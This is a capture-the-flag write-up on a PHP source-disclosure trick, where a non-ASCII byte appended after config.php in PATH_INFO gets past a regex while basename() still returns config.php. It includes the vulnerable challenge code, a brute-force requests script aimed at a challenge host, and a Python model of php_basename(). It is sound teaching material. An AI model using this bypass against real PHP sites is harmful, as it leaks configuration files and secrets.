Key points:
basename() returns the last component of a path, i.e. the filename. For example basename("test/index.php") returns index.php; a trailing slash is ignored, so basename("test/index.php/") also returns index.php (whereas basename("test/index.php/s") returns s).
The catch is that basename() is locale aware: a byte that is not a valid character in the current locale (in the C locale, which PHP usually runs under unless setlocale() or the environment changes it, that is every byte >= 0x80) is simply skipped when basename() decides where a path component starts and ends. A final path segment made only of such bytes is therefore not taken as the filename, so basename("config.php/\xff") still returns config.php.
Example challenge:
Code:
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if (hash_equals($secret, $guess)) {
        $message = 'Congratulations! The flag is: ' . FLAG;
    } else {
        $message = 'Wrong.';
    }
}
?>
The regex blocks any PHP_SELF that ends in config.php (optionally followed by slashes). $_SERVER['PHP_SELF'] includes the PATH_INFO, so requesting /index.php/config.php/<something> gives PHP_SELF = /index.php/config.php/<something>, which no longer matches. Appending just anything, e.g. /a, does get past the regex, but then basename() returns a and highlight_file() shows the wrong file. What we append therefore has to be something basename() ignores: a byte that is invalid in the current locale, i.e. a non-ASCII byte. basename() then returns config.php and highlight_file() prints config.php, FLAG included. Here is a script that brute-forces the byte:
import requests

url = 'http://317e76c1-04cb-4fcc-87cd-ed754c929a09.node4.buuoj.cn:81/'
# PHP_SELF becomes /index.php/config.php/<byte>, which the regex no longer matches
payload = 'index.php/config.php/'

for i in range(1, 256):
    # send the candidate as one raw percent-encoded byte; appending chr(i) directly
    # would make requests UTF-8 encode values >= 128 into two bytes
    payloads = payload + '%%%02X' % i + '?source'
    urls = url + payloads
    print(urls)
    r = requests.get(urls, timeout=10)
    # config.php is only highlighted (and the flag leaked) when basename() returned config.php
    if 'flag' in r.text:
        print(r.text)
        print("byte value that worked, i =", i)
        break
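To see why the trailing byte disappears, and which bytes actually get past both the regex and basename(), the following is an added example (not part of the original writeup or of the challenge): a Python model of the component-scanning loop in PHP's php_basename() (ext/standard/string.c). It assumes the C locale, where every byte >= 0x80 fails mblen(); in a UTF-8 locale a valid UTF-8 sequence would not be skipped, because basename() is locale aware. The names php_basename, passes_filter and bypass_bytes are this example's own.

```python
import re

# Model of the php_basename() scanning loop. Assumption (C locale): any byte
# >= 0x80 is an invalid multibyte sequence and is consumed without ever
# opening or closing a path component.
def php_basename(path: bytes, is_invalid=lambda b: b >= 0x80) -> bytes:
    comp = 0    # start of the most recent path component
    cend = 0    # one past its end
    state = 0   # 0 = between components, 1 = inside a component
    for i, b in enumerate(path):
        if is_invalid(b):
            continue            # mblen() failed: byte skipped, state untouched
        if b == ord('/'):
            if state == 1:      # a separator closes the current component
                state = 0
                cend = i
        elif state == 0:        # first valid byte opens a new component
            comp = i
            state = 1
    if state == 1:              # path did not end with a separator
        cend = len(path)
    return path[comp:cend]


# The preg_match() from the challenge; PCRE and Python both let $ match
# before a final newline, so \n is rejected by both.
FILTER = re.compile(rb'config\.php/*$', re.IGNORECASE)


def passes_filter(php_self: bytes) -> bool:
    return FILTER.search(php_self) is None


def bypass_bytes(script=b'/index.php', target=b'config.php'):
    """Bytes b for which <script>/config.php/<b> passes the regex while
    basename() still returns config.php (constructed PHP_SELF values)."""
    hits = []
    for b in range(256):
        php_self = script + b'/' + target + b'/' + bytes([b])
        if passes_filter(php_self) and php_basename(php_self) == target:
            hits.append(b)
    return hits


if __name__ == '__main__':
    for p in (b'test/index.php', b'test/index.php/', b'/index.php/config.php/a',
              b'/index.php/config.php/\xff', b'\xffconfig.php', b'config.php\xff'):
        print(p, '->', php_basename(p))
    print('bypass bytes:', [hex(b) for b in bypass_bytes()])
```

Two things the model makes visible: the skipped byte only "vanishes" when it forms its own slash-separated segment (config.php/\xff), because an invalid byte inside an already open component is kept (config.php\xff stays as it is); and under the C-locale assumption every byte 0x80..0xff works, which is why the brute force above succeeds as soon as it reaches 128.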